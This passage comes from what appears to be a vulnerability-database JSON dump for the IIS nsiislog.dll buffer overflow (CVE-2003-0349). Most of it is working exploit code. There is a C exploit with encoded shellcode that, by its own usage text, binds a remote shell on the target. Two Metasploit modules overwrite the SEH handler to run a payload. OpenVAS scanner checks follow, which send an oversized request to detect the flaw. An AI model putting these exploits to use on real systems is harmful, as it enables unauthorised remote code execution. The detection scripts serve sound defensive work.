\r\n\"\\xb9\\x15\\x03\\x80\\x30\\xfb\\x40\\x67\" \r\n\"\\xe2\\xf9\\x33\\xa3\\xf9\\xfb\\x72\\x66\" \r\n\"\\x53\\x06\\x04\\x04\\x76\\x66\\x37\\x06\" \r\n\"\\x04\\x04\\xa8\\x40\\xf6\\xbd\\xd9\\xea\" \r\n\"\\xf8\\x66\\x53\\x06\\x04\\x04\\xa8\\x93\" \r\n\"\\xfb\\xfb\\x04\\x04\\x13\\x91\\xfa\\xfb\" \r\n\"\\xfb\\x43\\xcd\\xbd\\xd9\\xea\\xf8\\x7e\" \r\n\"\\x53\\x06\\x04\\x04\\xab\\x04\\x6e\\x37\" \r\n\"\\x06\\x04\\x04\\xf0\\x3b\\xf4\\x7f\\xbe\" \r\n\"\\xfa\\xfb\\xfb\\x76\\x66\\x3b\\x06\\x04\" \r\n\"\\x04\\xa8\\x40\\xba\\xbd\\xd9\\xea\\xf8\" \r\n\"\\x66\\x53\\x06\\x04\\x04\\xa8\\xab\\x13\" \r\n\"\\xcc\\xfa\\xfb\\xfb\\x76\\x7e\\x8f\\x05\" \r\n\"\\x04\\x04\\xab\\x93\\xfa\\xfa\\xfb\\xfb\" \r\n\"\\x04\\x6e\\x4b\\x06\\x04\\x04\\xc8\\x20\" \r\n\"\\xa8\\xa8\\xa8\\x91\\xfd\\x91\\xfa\\x91\" \r\n\"\\xf9\\x04\\x6e\\x3b\\x06\\x04\\x04\\x72\" \r\n\"\\x7e\\xa7\\x05\\x04\\x04\\x9d\\x3c\\x7e\" \r\n\"\\x9f\\x05\\x04\\x04\\xf9\\xfb\\x9d\\x3c\" \r\n\"\\x7e\\x9d\\x05\\x04\\x04\\x73\\xfb\\x3c\" \r\n\"\\x7e\\x93\\x05\\x04\\x04\\xfb\\xfb\\xfb\" \r\n\"\\xfb\\x76\\x66\\x9f\\x05\\x04\\x04\\x91\" \r\n\"\\xeb\\xa8\\x04\\x4e\\xa7\\x05\\x04\\x04\" \r\n\"\\x04\\x6e\\x47\\x06\\x04\\x04\\xf0\\x3b\" \r\n\"\\x8f\\xe8\\x76\\x6e\\x9c\\x05\\x04\\x04\" \r\n\"\\x05\\xf9\\x7b\\xc1\\xfb\\xf4\\x7f\\x46\" \r\n\"\\xfb\\xfb\\xfb\\x10\\x2f\\x91\\xfa\\x04\" \r\n\"\\x4e\\xa7\\x05\\x04\\x04\\x04\\x6e\\x43\" \r\n\"\\x06\\x04\\x04\\xf0\\x3b\\xf4\\x7e\\x5e\" \r\n\"\\xfb\\xfb\\xfb\\x3c\\x7e\\x9b\\x05\\x04\" \r\n\"\\x04\\xeb\\xfb\\xfb\\xfb\\x76\\x7e\\x9b\" \r\n\"\\x05\\x04\\x04\\xab\\x76\\x7e\\x9f\\x05\" \r\n\"\\x04\\x04\\xab\\x04\\x4e\\xa7\\x05\\x04\" \r\n\"\\x04\\x04\\x6e\\x4f\\x06\\x04\\x04\\x72\" \r\n\"\\x7e\\xa3\\x05\\x04\\x04\\x07\\x76\\x46\" \r\n\"\\xf3\\x05\\x04\\x04\\xc8\\x3b\\x42\\xbf\" \r\n\"\\xfb\\xfb\\xfb\\x08\\x51\\x3c\\x7e\\xcf\" \r\n\"\\x05\\x04\\x04\\xfb\\xfa\\xfb\\xfb\\x70\" \r\n\"\\x7e\\xa3\\x05\\x04\\x04\\x72\\x7e\\xbf\" \r\n\"\\x05\\x04\\x04\\x72\\x7e\\xb3\\x05\\x04\" \r\n\"\\x04\\x72\\x7e\\xbb\\x05\\x04\\x04\\x3c\" \r\n\"\\x7e\\xf3\\x05\\x04\\x04\\xbf\\xfb\\xfb\" \r\n\"\\xfb\\xc8\\x20\\x76\\x7e\\x03\\x06\\x04\" \r\n\"\\x04\\xab\\x76\\x7e\\xf3\\x05\\x04\\x04\" \r\n\"\\xab\\xa8\\xa8\\x93\\xfb\\xfb\\xfb\\xf3\" \r\n\"\\x91\\xfa\\xa8\\xa8\\x43\\x8c\\xbd\\xd9\" \r\n\"\\xea\\xf8\\x7e\\x53\\x06\\x04\\x04\\xab\" \r\n\"\\xa8\\x04\\x6e\\x3f\\x06\\x04\\x04\\x04\" \r\n\"\\x4e\\xa3\\x05\\x04\\x04\\x04\\x6e\\x57\" \r\n\"\\x06\\x04\\x04\\x12\\xa0\\x04\\x04\\x04\" \r\n\"\\x04\\x6e\\x33\\x06\\x04\\x04\\x13\\x76\" \r\n\"\\xfa\\xfb\\xfb\\x33\\xef\\xfb\\xfb\\xac\" \r\n\"\\xad\\x13\\xfb\\xfb\\xfb\\xfb\\x7a\\xd7\" \r\n\"\\xdf\\xf9\\xbe\\xd9\\xea\\x43\\x0e\\xbe\" \r\n\"\\xd9\\xea\\xf8\\xff\\xdf\\x78\\x3f\\xff\" \r\n\"\\xab\\x9f\\x9c\\x04\\xcd\\xfb\\xfb\\x72\" \r\n\"\\x9e\\x03\\x13\\xfb\\xfb\\xfb\\xfb\\x7a\" \r\n\"\\xd7\\xdf\\xd8\\xbe\\xd9\\xea\\x43\\xac\" \r\n\"\\xbe\\xd9\\xea\\xf8\\xff\\xdf\\x78\\x3f\" \r\n\"\\xff\\x72\\xbe\\x07\\x9f\\x9c\\x72\\xdd\" \r\n\"\\xfb\\xfb\\x70\\x86\\xf3\\x9d\\x7a\\xc4\" \r\n\"\\xb6\\xa1\\x8e\\xf4\\x70\\x0c\\xf8\\x8d\" \r\n\"\\xc7\\x7a\\xc5\\xab\\xbe\\xfb\\xfb\\x8e\" \r\n\"\\xf9\\x10\\xf3\\x7a\\x14\\xfb\\xfb\\xfa\" \r\n\"\\xfb\\x10\\x19\\x72\\x86\\x0b\\x72\\x8e\" \r\n\"\\x17\\x70\\x86\\xf7\\x42\\x6d\\xfb\\xfb\" \r\n\"\\xfb\\xc9\\x3b\\x09\\x55\\x72\\x86\\x0f\" \r\n\"\\x70\\x34\\xd0\\xb6\\xf7\\x70\\xad\\x83\" \r\n\"\\xf8\\xae\\x0b\\x70\\xa1\\xdb\\xf8\\xa6\" \r\n\"\\x0b\\xc8\\x3b\\x70\\xc0\\xf8\\x86\\x0b\" \r\n\"\\x70\\x8e\\xf7\\xaa\\x08\\x5d\\x8e\\xfe\" \r\n\"\\x78\\x3f\\xff\\x10\\xf1\\xa2\\x78\\x38\" \r\n\"\\xff\\xbb\\xc0\\xb9\\xe3\\x8e\\x1f\\xc0\" \r\n\"\\xb9\\xe3\\x8e\\xf9\\x10\\xb8\\x70\\x89\" \r\n\"\\xdf\\xf8\\x8e\\x0b\\x2a\\x1b\\xf8\\x3d\" \r\n\"\\xf4\\x4c\\xfb\\x70\\x81\\xe7\\x3a\\x1b\" \r\n\"\\xf9\\xf8\\xbe\\x0b\\xf8\\x3c\\x70\\xfb\" \r\n\"\\xf8\\xbe\\x0b\\x70\\xb6\\x0f\\x72\\xb6\" \r\n\"\\xf7\\x70\\xa6\\xeb\\x72\\xf8\\x78\\x96\" \r\n\"\\xeb\\xff\\x70\\x8e\\x17\\x7b\\xc2\\xfb\" \r\n\"\\x8e\\x7c\\x9f\\x9c\\x74\\xfd\\xfb\\xfb\" \r\n\"\\x78\\x3f\\xff\\xa5\\xa4\\x32\\x39\\xf7\" \r\n\"\\xfb\\x70\\x86\\x0b\\x12\\x99\\x04\\x04\" \r\n\"\\x04\\x33\\xfb\\xfb\\xfb\\x70\\xbe\\xeb\" \r\n\"\\x7a\\x53\\x67\\xfb\\xfb\\xfb\\xfb\\xfb\" \r\n\"\\xfa\\xfb\\x43\\xfb\\xfb\\xfb\\xfb\\x32\" \r\n\"\\x38\\xb7\\x94\\x9a\\x9f\\xb7\\x92\\x99\" \r\n\"\\x89\\x9a\\x89\\x82\\xba\\xfb\\xbe\\x83\" \r\n\"\\x92\\x8f\\xab\\x89\\x94\\x98\\x9e\\x88\" \r\n\"\\x88\\xfb\\xb8\\x89\\x9e\\x9a\\x8f\\x9e\" \r\n\"\\xab\\x89\\x94\\x98\\x9e\\x88\\x88\\xba\" \r\n\"\\xfb\\xfb\\xac\\xa8\\xc9\\xa4\\xc8\\xc9\" \r\n\"\\xd5\\xbf\\xb7\\xb7\\xfb\\xac\\xa8\\xba\" \r\n\"\\xa8\\x94\\x98\\x90\\x9e\\x8f\\xba\\xfb\" \r\n\"\\x99\\x92\\x95\\x9f\\xfb\\x97\\x92\\x88\" \r\n\"\\x8f\\x9e\\x95\\xfb\\x9a\\x98\\x98\\x9e\" \r\n\"\\x8b\\x8f\\xfb\\xac\\xa8\\xba\\xa8\\x8f\" \r\n\"\\x9a\\x89\\x8f\\x8e\\x8b\\xfb\\x98\\x97\" \r\n\"\\x94\\x88\\x9e\\x88\\x94\\x98\\x90\\x9e\" \r\n\"\\x8f\\xfb\\xfb\\x98\\x96\\x9f\\xfb\\xe9\" \r\n\"\\xc4\\xfc\\xff\\xff\\x74\\xf9\\x75\\xf7\"; \r\n\r\n\r\nconst DWORD default_EIP_pos = 9992; //\u00af\u00ae\u00ab\u00ae\u00a6\u00a5\u00ad\u00a8\u00a5 EIP \u00a2 \u00a1\u00e3\u00e0(sploit) \r\nconst DWORD default_EBX_points_to = 9988; //\u00e3\u00a7 \u296b\u00ec EBX \u00ae\u2b6e\u00e1\u00a5\u00ab\ucb6e sploit \r\n//const DWORD default_EIP_value = 0x77F8441B; //\u00af\u00ae \u00ed\u00ac\u00e3\u00a4\u00e0\u00a4.\u00a1. JMP EDX, \u00a2 \u00a4 \u00ad\u00ad\u00ae\u00ac \u00e1\u00e7 \u00ed \u00a2 ntdll.dll \r\nconst DWORD default_EIP_value = 0x40F01333; \r\n//const default_EDX_points_to = 0x1000; //\u00ed \u00ad\u00a5 \u00af\u0a23\u00ae\u00a4\u00a8\u00ab\u00ae\u00e1\r\nchar *nsiislog_default = \"/scripts/nsiislog.dll\"; \r\nchar sploit[default_EIP_pos+4+sizeof(shellcode)+1]; \r\nchar sploitbuf[sizeof(sploit)*2]; \r\n\r\nvoid usage(char* argv[]) \r\n{ \r\n printf(\"Dicklamer (: \" \r\n \"We are not responsible for the illegal use of this software.\\n\" \r\n \"Description: Binds shell to port 34816 (or higher if port busy).\\n\" \r\n \"Usage: \" \r\n \"%s target [-p target_port] [-r /renamed_scripts/renamed_nsiislog.dll]\\n\" \r\n \"Supported target(s):\\n\" \r\n \"Windows version\\t\\t\\t\\tnsiislog.dll version\\n\" \r\n \"------------------------------------------------------------\\n\" \r\n \"2000 [5.00.2195] server rus.\\t\\t4.1.0.3917\\n\", argv[0]); \r\n exit(0); \r\n} \r\n\r\nint main(int argc, char* argv[]) \r\n{ \r\n#ifdef WIN32 \r\n WSADATA wsaData; \r\n#endif \r\n int target_port = 80; \r\n char *nsiislog = nsiislog_default; \r\n int nArgIndex; \r\n\r\n if (argc<2) usage(argv); \r\n nArgIndex = 1; \r\n while ((nArgIndex < argc)&&(strlen(argv[nArgIndex])>=2)&&(argv[nArgIndex][0]=='-')) \r\n { \r\n switch (argv[nArgIndex++][1]) \r\n { \r\n case 'p': \r\n case 'P': \r\n target_port = atoi(argv[nArgIndex++]); \r\n continue; \r\n case 'r': \r\n case 'R': \r\n nsiislog = argv[nArgIndex++]; \r\n continue; \r\n default: \r\n usage(argv); \r\n } \r\n } \r\n \r\n try { \r\n#ifdef WIN32 \r\n WSAStartup(0x0101, &wsaData); \r\n#endif \r\n SOCKET s = socket(AF_INET,SOCK_STREAM,0); \r\n if (s == INVALID_SOCKET) throw(\"No socket\"); \r\n sockaddr_in addr; \r\n \r\n //.\u00af\u0964\u00a5\u00ab\u585e \u00a4\u00e0 \u00e1\u00a2 \u00aa \r\n ULONG iaddr = inet_addr(argv[1]); \r\n if (iaddr == INADDR_NONE) {//.\u00a4\u00e0 - \u00a8\u00ac\u00ef\u00a5\u00e0\u00aa \r\n hostent *ph = gethostbyname(argv[1]); \r\n if (!ph) throw(\"Cant resolve hostname\"); \r\n memcpy(&addr.sin_addr.s_addr,ph->h_addr_list[0],sizeof(in_addr)); \r\n } else {//.\u00a4\u00e0 - IP \r\n memcpy(&addr.sin_addr.s_addr,&iaddr,4); \r\n }; \r\n \r\n addr.sin_family = AF_INET; \r\n addr.sin_port = htons(target_port); \r\n int sizeofaddr=sizeof(addr); \r\n\r\nchar *req = \"MX_STATS_LogLine: \"; \r\nstrcpy(sploit, req); \r\nmemset(sploit+strlen(sploit), 0xCC, default_EIP_pos-strlen(req)); \r\n//memcpy(sploit+default_EDX_points_to, shellcode, sizeof(shellcode)-1/*\u00e3 \u00e2\\0*/); \r\nmemcpy(sploit+default_EBX_points_to-(sizeof(shellcode)-1)+4, shellcode, sizeof(shellcode)-1/*\u00e3 \u00e2\\0*/); \r\n//\u00af\u00e0\u00af\u00a5\u00e0\u00ae\u00a4\u00a5 \u00ad EIP, EBX \u00a1\u3925\u00e2\u00aa \u00a7\u00eb\u00e2\u00ad \u00af\u00ae\u1ae5\u00a4\u00ad\u00a8\u00a9 DWORD \u00ad \u8963\u00ae \u00a7 \u00af\u00e0 , \u00a3\u00a4\u00a5 JZ/JNZ \r\nmemcpy(sploit+default_EIP_pos, &default_EIP_value, sizeof default_EIP_value); \r\n \r\n /*strcpy(sploit+sizeof(sploit)-11,\"BCDEFGHIJK\");*/ \r\n sploit[sizeof(sploit)-1] = 0; \r\n \r\n if (connect(s,(struct sockaddr*)&addr,sizeof(struct sockaddr)) == SOCKET_ERROR) throw(\"Cant connect host\"); \r\n\r\n sprintf(sploitbuf, \r\n \"POST %s HTTP/1.0\\r\\n\" \r\n \"Accept: */*\\r\\n\" \r\n \"User-Agent: NSPlayer/4.1.0.3917\\r\\n\" \r\n \"Content-Type: text/plain\\r\\n\" \r\n \"Content-Length: %i\\r\\n\" \r\n \"Pragma: xClientGUID={89f451e0-a491-4346-ad78-4d55aac89045}\\r\\n\" \r\n \"\\r\\n%s\\r\\n\", \r\n nsiislog,strlen(sploit),sploit); \r\n \r\n int snd=send(s,sploitbuf,strlen(sploitbuf),0); \r\n if (snd == strlen(sploitbuf)) printf(\"Target exploited.\\n\"); \r\n else throw(\"Cant send exploit\"); \r\n closesocket(s); \r\n } \r\n catch (char *errmsg) \r\n { \r\n \r\n printf(\"%s\\n\",errmsg); \r\n return -1; \r\n } \r\n catch (int err_n) \r\n { \r\n printf(\"error %i\\n\",err_n); \r\n return err_n; \r\n } \r\n#ifdef WIN32 \r\n WSACleanup(); \r\n#endif \r\n return 0; \r\n} \r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/22837/"}], "packetstorm": [{"lastseen": "2016-12-05T22:17:10", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0349"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83155", "href": "https://packetstormsecurity.com/files/83155/Microsoft-IIS-ISAPI-nsiislog.dll-ISAPI-POST-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::BruteTargets \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow', \n'Description' => %q{ \nThis exploits a buffer overflow found in the nsiislog.dll \nISAPI filter that comes with Windows Media Server. This \nmodule will also work against the 'patched' MS03-019 \nversion. This vulnerability was addressed by MS03-022. \n \n}, \n'Author' => [ 'hdm' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2003-0349'], \n[ 'OSVDB', '4535'], \n[ 'BID', '8035'], \n[ 'MSB', 'MS03-022'], \n[ 'URL', 'http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html'], \n \n], \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\\x2b\\x26\\x3d\\x25\\x0a\\x0d\\x20\", \n'StackAdjustment' => -3500, \n \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# SEH offsets by version (Windows 2000) \n# 4.1.0.3917 = 9992 \n# 4.1.0.3920 = 9992 \n# 4.1.0.3927 = 9992 \n# 4.1.0.3931 = 14092 \n \n['Brute Force', { }], \n['Windows 2000 -MS03-019', { 'Rets' => [ 9988, 0x40f01333 ] }], \n['Windows 2000 +MS03-019', { 'Rets' => [ 14088, 0x40f01353 ] }], \n['Windows XP -MS03-019', { 'Rets' => [ 9992, 0x40f011e0 ] }], \n], \n'DisclosureDate' => 'Jun 25 2003', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('URL', [ true, \"The path to nsiislog.dll\", \"/scripts/nsiislog.dll\" ]), \n], self.class) \nend \n \ndef check \nres = send_request_raw({ \n'uri' => datastore['URL'] \n}, -1) \n \nif (res and res.body =~ /NetShow ISAPI/) \nreturn Exploit::CheckCode::Detected \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit_target(target) \n \n# Create a buffer greater than max SEH offset (16384) \npst = rand_text_alphanumeric(256) * 64 \n \n# Create SEH frame and insert into buffer \nseh = generate_seh_payload(target['Rets'][1]) \npst[target['Rets'][0], seh.length] = seh \n \n# Send it to the server \nprint_status(\"Sending request...\") \nres = send_request_cgi({ \n'uri' => datastore['URL'], \n'method' => 'POST', \n'user-agent' => 'NSPlayer/2.0', \n'content-type' => 'application/x-www-form-urlencoded', \n'data' => pst \n}, 5) \n \nsleep(1) \n \nhandler \ndisconnect \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83155/nsiislog_post.rb.txt"}, {"lastseen": "2016-12-05T22:11:47", "description": "", "published": "2010-07-26T00:00:00", "type": "packetstorm", "title": "Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0349"], "modified": "2010-07-26T00:00:00", "id": "PACKETSTORM:92137", "href": "https://packetstormsecurity.com/files/92137/Microsoft-IIS-ISAPI-nsiislog.dll-ISAPI-POST-Overflow.html", "sourceData": "`## \n# $Id: ms03_022_nsiislog_post.rb 9929 2010-07-25 21:37:54Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::BruteTargets \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow', \n'Description' => %q{ \nThis exploits a buffer overflow found in the nsiislog.dll \nISAPI filter that comes with Windows Media Server. This \nmodule will also work against the 'patched' MS03-019 \nversion. This vulnerability was addressed by MS03-022. \n}, \n'Author' => [ 'hdm' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 9929 $', \n'References' => \n[ \n[ 'CVE', '2003-0349'], \n[ 'OSVDB', '4535'], \n[ 'BID', '8035'], \n[ 'MSB', 'MS03-022'], \n[ 'URL', 'http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html'], \n], \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\\x2b\\x26\\x3d\\x25\\x0a\\x0d\\x20\", \n'StackAdjustment' => -3500, \n \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# SEH offsets by version (Windows 2000) \n# 4.1.0.3917 = 9992 \n# 4.1.0.3920 = 9992 \n# 4.1.0.3927 = 9992 \n# 4.1.0.3931 = 14092 \n \n['Brute Force', { }], \n['Windows 2000 -MS03-019', { 'Rets' => [ 9988, 0x40f01333 ] }], \n['Windows 2000 +MS03-019', { 'Rets' => [ 14088, 0x40f01353 ] }], \n['Windows XP -MS03-019', { 'Rets' => [ 9992, 0x40f011e0 ] }], \n], \n'DisclosureDate' => 'Jun 25 2003', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('URL', [ true, \"The path to nsiislog.dll\", \"/scripts/nsiislog.dll\" ]), \n], self.class) \nend \n \ndef check \nres = send_request_raw({ \n'uri' => datastore['URL'] \n}, -1) \n \nif (res and res.body =~ /NetShow ISAPI/) \nreturn Exploit::CheckCode::Detected \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit_target(target) \n \n# Create a buffer greater than max SEH offset (16384) \npst = rand_text_alphanumeric(256) * 64 \n \n# Create SEH frame and insert into buffer \nseh = generate_seh_payload(target['Rets'][1]) \npst[target['Rets'][0], seh.length] = seh \n \n# Send it to the server \nprint_status(\"Sending request...\") \nres = send_request_cgi({ \n'uri' => datastore['URL'], \n'method' => 'POST', \n'user-agent' => 'NSPlayer/2.0', \n'content-type' => 'application/x-www-form-urlencoded', \n'data' => pst \n}, 5) \n \nselect(nil,nil,nil,1) \n \nhandler \ndisconnect \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/92137/ms03_022_nsiislog_post.rb.txt"}], "openvas": [{"lastseen": "2020-05-12T17:33:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0349"], "description": "There is a flaw in the way nsiislog.dll processes incoming client requests.\n A vulnerability exists because an attacker could send specially formed HTTP request (communications)\n to the server that could cause IIS to fail or execute code on the user", "modified": "2020-05-08T00:00:00", "published": "2009-03-16T00:00:00", "id": "OPENVAS:1361412562310101016", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310101016", "type": "openvas", "title": "Microsoft MS03-022 security check", "sourceData": "###################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Security Bulletin MS03-022\n# Vulnerability in ISAPI Extension for Windows Media Services Could Cause Code Execution\n# Microsoft Windows Media Services 'nsiislog.dll' Buffer Overflow Vulnerability (MS03-019)\n# BUGTRAQ:20030626 Windows Media Services Remote Command Execution #2\n#\n# Affected Software:\n# Microsoft Windows 2000\n#\n# Not Affected Software Versions:\n# Microsoft Windows XP\n# Microsoft Windows Server 2003\n#\n# remote-MS03-022.nasl\n#\n# Author:\n# Copyright (C) 2009 Christian Eric Edjenguele <christian.edjenguele@owasp.org>\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2 or later,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.101016\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-03-16 23:15:41 +0100 (Mon, 16 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2003-0349\");\n script_name(\"Microsoft MS03-022 security check\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2009 Christian Eric Edjenguele <christian.edjenguele@owasp.org>\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_ms_iis_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"IIS/installed\");\n\n script_tag(name:\"solution\", value:\"Microsoft has released a patch to correct these issues.\n Please see the references for more information.\n\n Note: This patch can be installed on systems running Microsoft Windows 2000 Service Pack 2,\n Windows 2000 Service Pack 3 and Microsoft Windows 2000 Service Pack 4.\n This patch has been superseded by the one provided in Microsoft Security Bulletin MS03-019.\");\n\n script_tag(name:\"summary\", value:\"There is a flaw in the way nsiislog.dll processes incoming client requests.\n A vulnerability exists because an attacker could send specially formed HTTP request (communications)\n to the server that could cause IIS to fail or execute code on the user's system.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_xref(name:\"URL\", value:\"http://www.microsoft.com/downloads/details.aspx?FamilyId=F772E131-BBC9-4B34-9E78-F71D9742FED8&displaylang=en\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2003/ms03-019\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = http_get_port( default:80 );\n\nhostname = http_host_name( port:port );\n\nremote_exe = '';\n\nsoc = open_sock_tcp(port);\nif( ! soc ) exit( 0 );\n\nreq = http_get( item:\"/scripts/nsiislog.dll\", port:port );\nsend( socket:soc, data:req );\n\nreply = recv( socket:soc, length:4096 );\n\nif( reply ) {\n\n if( 'NetShow ISAPI Log Dll' >< reply ) {\n\n url_args = make_list('date', 'time',\n 'c-dns', 'cs-uri-stem', 'c-starttime', 'x-duration', 'c-rate',\n 'c-status', 'c-playerid', 'c-playerversion', 'c-player-language',\n 'cs(User-Agent)', 'cs(Referer)', 'c-hostexe');\n\n foreach parameter (url_args) remote_exe += parameter + \"=vttest&\";\n\n remote_exe += 'c-ip=' + crap(65535);\n\n mpclient = string(\"POST /\", \"/scripts/nsiislog.dll\", \" HTTP/1.0\\r\\n\",\n \"Host: \", hostname, \"\\r\\n\",\n \"User-Agent: \", \"NSPlayer/2.0\", \"\\r\\n\",\n \"Content-Type: \", \"application/x-www-form-urlencoded\" , \"\\r\\n\",\n \"Content-Length: \", strlen(remote_exe) , \"\\r\\n\\r\\n\");\n\n send( socket:soc, data:mpclient );\n\n response = recv(socket:soc, length:4096);\n if( ( egrep( pattern:\"HTTP/1.[01] 500\", string:response ) ) && ( 'The remote procedure call failed. ' >< response ) ) {\n security_message( port:port );\n }\n }\n}\n\nclose( soc );\n\nexit( 0 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-10T19:56:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0227", "CVE-2003-0349"], "description": "This host is running Microsoft Windows Media Services and is prone\n to remote code execution vulnerabilities.", "modified": "2020-06-09T00:00:00", "published": "2012-07-25T00:00:00", "id": "OPENVAS:1361412562310802897", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802897", "type": "openvas", "title": "Microsoft Windows Media Services ISAPI Extension Code Execution Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Media Services ISAPI Extension Code Execution Vulnerabilities\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:iis\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802897\");\n script_version(\"2020-06-09T10:15:40+0000\");\n script_cve_id(\"CVE-2003-0227\", \"CVE-2003-0349\");\n script_bugtraq_id(7727, 8035);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 10:15:40 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-07-25 16:04:16 +0530 (Wed, 25 Jul 2012)\");\n script_name(\"Microsoft Windows Media Services ISAPI Extension Code Execution Vulnerabilities\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/9115\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/8883\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/id?1007059\");\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/113716\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2003/ms03-019\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2003/ms03-022\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/default.aspx?scid=kb;en-us;822343\");\n script_category(ACT_DENIAL);\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"Web 